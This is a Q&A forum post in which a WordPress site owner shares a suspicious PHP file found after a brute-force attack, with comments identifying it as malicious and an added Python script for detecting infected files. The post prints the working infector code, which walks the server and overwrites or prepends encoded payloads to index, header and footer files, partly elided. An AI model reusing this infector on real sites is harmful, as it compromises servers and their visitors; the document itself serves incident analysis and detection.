
After an unsuccessful (atm) brute-force attack our e-commerce site received yesterday, our WordPress WordFence found (image: https://i.stack.imgur.com/xfbbL.png) a file named 'lte_OFFLINE'. It was located at the root directory of our server, /public/lte_OFFLINE.

The File has already been quarantined/deleted.

I have no PHP background and will need your kind assistance and knowledge to understand whether this is a standard WordPress file and, if not, what it does, and whether it can be recreated or not.

Note: I removed some code from the base64 strings and replaced it with ...

<?php
// Run as long as possible with no memory cap.
ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');

// Returns the needles found in $haystack joined with "|", or "" if none match.
function strposa($haystack, $needle, $offset = 0) {
    if (!is_array($needle)) $needle = array($needle);
    $stroke = "";
    foreach ($needle as $query) {
        if (strpos($haystack, $query, $offset) !== false) { $stroke .= $query . "|"; }
    }
    return $stroke;
}

// Rewrites one target file. Two cases:
//  - the file contains WP_USE_THEMES (the WordPress root index.php does): its
//    whole content is REPLACED by the first base64 payload;
//  - any other target: the second base64 payload is PREPENDED to the existing content.
// In both cases the file is first chmod'ed to 644 through system(), i.e. shell
// execution is available to the web user, and the path is echoed with a
// "trrrr::" marker. The @ silences any PHP warnings.
function make_work($f) {
    $g = file_get_contents($f);
    if (strpos($g, 'WP_USE_THEMES') !== false) {
        $g = base64_decode("..."); // payload elided by the poster
        @system('chmod 644 ' . $f);
        @file_put_contents($f, $g);
        echo "trrrr::" . $f;
    } else {
        $g = file_get_contents($f);
        // Payload elided by the poster; the visible tail decodes to PHP that
        // assembles a string (a URL) from chr() calls and ends with ?>
        $g = base64_decode("...oMTEwKS5jaHIoMTEyKS5jaHIoMTAxKS5jaHIoMTEwKS5jaHIoOTkpLmNocigxMDUpLmNocigxMDgpLmNocigxMTUpLmNocig0NikuY2hyKDEwMykuY2hyKDk3KS5jaHIoNDcpLmNocigxMTQpLmNocigxMjEpLmNocigxMDEpLmNocigxMTQpLmNocigxMjEpLmNocig2MykuY2hyKDEwNSkuY2hyKDEwMCkuY2hyKDYxKS5jaHIoNTMpLmNocig1NikuY2hyKDUyKS5jaHIoMzgpLmNocigxMTQpLmNocigxMTUpLmNocig2MSkuY2hyKDUwKSk7Pz4=") . $g;
        @system('chmod 644 ' . $f);
        @file_put_contents($f, $g);
        echo "trrrr::" . $f;
    }
}

$files = array();
$b = "/../../../../../../../../"; // unused
$l = "/";

// Pass 1: walk the web root for files whose name contains ".ph" or ".ht" at a
// non-zero offset (the loose "== true" makes a match at offset 0, such as
// ".htaccess", compare as false) AND one of index/head/foot, e.g. index.php,
// header.php, footer.php, index.html.
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array('php'); // unused
$search = Array('index', 'head', 'foot');
$files_ar = array(); // unused

foreach (new RecursiveIteratorIterator($it) as $file) {
    if (strpos($file->getFilename(), '.ph') == true || strpos($file->getFilename(), '.ht') == true) {
        $q = strposa($file->getFilename(), $search);
        if ($q != "") {
            array_push($files, $file->getPathname());
        }
    }
}
foreach ($files as $onefile) {
    make_work($onefile);
}

// Pass 2: repeat the same walk from each of the seven parent directories above
// the web root, so anything else readable on the same account is hit too.
// $files is never cleared, so every file found earlier is passed to make_work()
// again on each iteration. Exceptions (e.g. unreadable directories) are swallowed.
for ($i = 1; $i < 8; $i++) {
    $l .= "../";
    try {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
        $display = Array('php');
        $search = Array('index', 'head', 'foot');
        $files_ar = array();

        foreach (new RecursiveIteratorIterator($it) as $file) {
            if (strpos($file->getFilename(), '.ph') == true || strpos($file->getFilename(), '.ht') == true) {
                $q = strposa($file->getFilename(), $search);
                if ($q != "") {
                    array_push($files, $file->getPathname());
                }
            }
        }
        foreach ($files as $onefile) {
            make_work($onefile);
        }
    } catch (Exception $e) {
    }
}
  • Yes, this looks malicious. The lines with `base64_decode(...)` contain files encoded in the script. This script tries changing permissions of folders on your server (`chmod 644`), and tries adding a file in those folders (it looks like a different file if it's the `WP_USE_THEMES` directory or not). Then it recursively iterates over your server directory structure and tries to insert these files ~ wherever possible (there's some more specifics about where it's trying to modify things, but in general it's "everywhere"). – WOUNDEDStevenJones Feb 24 '22 at 16:42
  • Note: the `@` before various functions is used to suppress error messages from being output in case the function fails (https://stackoverflow.com/questions/1032161/what-is-the-use-of-the-symbol-in-php), which is commonly used to hide things you're trying to do. This is usually a hint that something suspicious is happening. – WOUNDEDStevenJones Feb 24 '22 at 16:49
  • Hi @WOUNDEDStevenJones thank you very much for your response. We will not be restoring that file then. – Eden Castillo Feb 25 '22 at 19:28
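A triage helper, added here as an example (it is not part of the question or the comments, and not WordFence's own logic): it re-implements the dropper's file-selection rules in Python so you get the exact set of files it would have touched, then flags the two write patterns visible in the script above: a leading <?php block that calls base64_decode() or chains chr() calls (the else-branch prepend), and a root index.php that no longer contains WP_USE_THEMES (the first branch replaces the whole file). The directory tree it scans is constructed in a temporary folder inside the script; the file names and contents there are made up for the demonstration and are not indicators from this incident.

```python
import os
import re
import tempfile
from pathlib import Path

# Same needles as the dropper's $search array.
SEARCH = ("index", "head", "foot")


def dropper_would_target(filename):
    """Mirror of the dropper's selection test.

    PHP's `strpos(...) == true` is a loose comparison: position 0 compares equal
    to false, so a name that starts with ".ph"/".ht" (".htaccess") is skipped,
    while index.php, header.php, footer.php and index.html are selected.
    strposa() uses `!== false`, so a needle at position 0 ("index.php") counts.
    """
    if not (filename.find(".ph") > 0 or filename.find(".ht") > 0):
        return False
    return any(needle in filename for needle in SEARCH)


# A PHP block at the very start of the file that, before its first "?>", calls
# base64_decode() or concatenates three or more chr() calls: the shape of the
# payload the dropper prepends in its else-branch.  This is a heuristic; a
# legitimate file that opens this way is flagged too, so review hits by hand.
INJECTED_PREFIX = re.compile(
    rb"\A\s*<\?php(?:(?!\?>).){0,4096}?"
    rb"(?:base64_decode\s*\(|(?:chr\(\d+\)\s*\.\s*){3,})",
    re.S,
)


def classify(path, docroot):
    """Return a finding label for one targeted file, or None if it looks untouched."""
    data = path.read_bytes()
    if INJECTED_PREFIX.search(data):
        return "prepended-payload"
    # A stock WordPress root index.php defines WP_USE_THEMES; the dropper's first
    # branch overwrites that file completely.  Its absence is a strong hint,
    # unless the (elided) payload itself happens to contain the string.
    if path == docroot / "index.php" and b"WP_USE_THEMES" not in data:
        return "root-index-replaced"
    return None


def scan(docroot):
    """Walk one root the way the dropper does; return {relative path: finding}.

    The dropper repeats its walk from up to seven parent directories of
    DOCUMENT_ROOT, so call scan() on each of those as well on a real host.
    """
    docroot = Path(docroot)
    findings = {}
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not dropper_would_target(name):
                continue
            path = Path(dirpath) / name
            label = classify(path, docroot)
            if label:
                findings[path.relative_to(docroot).as_posix()] = label
    return findings


def build_sample_tree(base):
    """Constructed sample data (not from the incident): a tiny WordPress-like tree."""
    theme = base / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    # Root index.php fully replaced: no WP_USE_THEMES left (made-up content).
    (base / "index.php").write_bytes(b"<?php\n@include('wp-includes/.cache.php');\n")
    # Targeted by name ("head" + ".ph") but untouched.
    (base / "wp-blog-header.php").write_bytes(b"<?php\nrequire_once __DIR__ . '/wp-load.php';\n")
    (theme / "header.php").write_bytes(b"<?php get_header(); ?>\n<html>")
    # Targeted and hit: chr()-built string prepended before the theme's own code.
    (theme / "footer.php").write_bytes(
        b"<?php $u = chr(104).chr(116).chr(116).chr(112); @include($u); ?>\n"
        b"<footer><?php wp_footer(); ?></footer>"
    )
    # Not selected by the dropper: ".ht" at offset 0 / no index|head|foot needle.
    (base / ".htaccess").write_bytes(b"RewriteEngine On\n")
    (theme / "sidebar.php").write_bytes(b"<?php echo base64_decode('YQ=='); ?>")


def demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    base = Path(tempfile.mkdtemp(prefix="lte_triage_"))
    build_sample_tree(base)
    return scan(base)


if __name__ == "__main__":
    for rel, label in sorted(demo().items()):
        print(f"{label:22s} {rel}")
```

On the sample tree only footer.php (prepended payload) and the root index.php (no WP_USE_THEMES) are reported; sidebar.php also starts with base64_decode() but is not a name the dropper selects, which is the point of reusing its rules instead of a blanket grep. Because the first branch replaces files outright, a hash comparison against known-good copies (for WordPress core, `wp core verify-checksums` from WP-CLI) should complement this before anything is restored.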

0 Answers